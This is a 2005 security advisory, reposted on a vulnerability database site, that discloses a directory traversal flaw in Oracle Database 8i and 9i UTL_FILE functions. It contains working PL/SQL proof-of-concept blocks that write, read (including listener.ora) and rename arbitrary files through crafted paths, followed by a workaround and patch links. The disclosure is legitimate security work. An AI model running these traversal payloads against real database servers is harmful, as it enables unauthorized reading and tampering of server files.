Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

ARGENISS-ADV-030501.txt

🗓️ 15 Mar 2005 00:00:00Reported by Cesar CerrudoType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 29 Views

Oracle Database Server vulnerability allows unauthorized file access via directory traversal.

Code
`Argeniss Security Advisory  
  
  
Name: Oracle Database Server Directory transversal  
Affected Software: Oracle Database Server versions 8i  
and 9i  
Severity : Medium  
Remote exploitable: Yes (Authentication to Database  
Server is needed)  
Credits: Cesar Cerrudo  
Date: 03/07/05  
Advisory Number: ARG030501  
  
  
Details:  
  
Oracle Database Server provides many packages  
functions to access the OS file system, some of these  
functions are not able to access files directly, for  
example in order to access files a Directory Object   
must be created and grant to users permissions on the  
object, this object references a directory in the   
file system and it can be used by functions to access  
files under that directory only. However functions   
don't properly validate the input and by supplying a  
especially constructed string the directory can be   
escaped and the parent directories can be accessed,  
because of this any file in the same drive  
as the directory, can be read, renamed, overwrited,  
etc.  
  
  
To reproduce the vulnerability execute the next  
PL/SQL:  
(In older Oracle database server versions the same  
could work just using "\..\..\")  
(This is not a extensive list of vulnerable functions,  
other functions that parse files could  
also be vulnerable)  
  
--this create a file called Unbreakable.txt in the  
same drive as the directory referenced by   
--MEDIA_DIR directory object.  
declare  
f utl_file.file_type;  
begin  
f:=UTL_FILE.FOPEN  
('MEDIA_DIR','\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\Unbreakable.txt','w',1000);  
UTL_FILE.PUT_LINE (f,'Sure',TRUE);  
UTL_FILE.FCLOSE(f);  
end;  
  
--this example can be used to read arbitrary files in  
the same drive as the directory referenced by   
--MEDIA_DIR directory object.  
SET SERVEROUTPUT ON  
declare  
f utl_file.file_type;  
sBuffer Varchar(8000);  
begin  
f:=UTL_FILE.FOPEN  
('MEDIA_DIR','\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\OracleDir\ora90\network\ADMIN\listener.ora','r');  
loop  
UTL_FILE.GET_LINE (f,sBuffer);  
DBMS_OUTPUT.PUT_LINE(sBuffer);  
end loop;  
EXCEPTION  
when no_data_found then  
UTL_FILE.FCLOSE(f);  
end;  
  
--this rename any file in the same drive as the  
directory referenced by   
--MEDIA_DIR directory object  
begin  
  
UTL_FILE.frename('MEDIA_DIR','\\.\\..\\.\\..\\.\\FileToRename','MEDIA_DIR','\\.\\..\\.\\..\\.\\Unbreakable.txt',TRUE);  
end;  
  
  
By default UTL_FILE package has execute permission to  
public role so any Oracle database   
user with permissions on a Directory Object can  
exploit this vulnerability.  
Explotation of this vulnerability allow an attacker to  
overwrite, read, rename, etc.   
arbitrary files.  
  
  
Vendor Status:  
  
Oracle was contacted on October 2003, after an initial  
email interchange i didn't have any  
news about when the vulnerability was going to be  
patched or when it was patched nor i was credited,   
but this is common when dealing with Oracle on  
security issues.  
  
  
Workaround:  
  
Restrict access to Directory Objects and UTL_FILE  
package.  
  
  
  
Patch Available:   
  
http://metalink.oracle.com  
  
  
Links:  
  
http://www.argeniss.com/research/ARGENISS-ADV-030501.txt  
http://www.petefinnigan.com/directory_traversal.pdf  
http://www.oracle.com/technology/deploy/security/pdf/cpu-jan-2005_advisory.pdf  
  
  
  
Important!!!!!!!!  
  
There are still hundreds of unpatched Oracle Database  
Server vulnerabilities affecting   
versions 8i, 9i and 10g some of them have been  
reported more than 1 year ago.  
If you want to know more about these vulnerabilities  
and many others check out our   
AVI (Advanced Vulnerability Information) service at  
http://www.argeniss.com/services.html  
  
  
  
  
-----------------------------------  
--Argeniss - Information Security--  
-----http://www.argeniss.com-------  
------info>at<argeniss.com---------  
-----------------------------------  
  
  
  
  
  
  
__________________________________   
Celebrate Yahoo!'s 10th Birthday!   
Yahoo! Netrospective: 100 Moments of the Web   
http://birthday.yahoo.com/netrospective/  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
15 Mar 2005 00:00Current
7.4High risk
Vulners AI Score7.4
oracle database serverdirectory traversalremote exploitsecurity advisoryfile system accesscesar cerrudo
29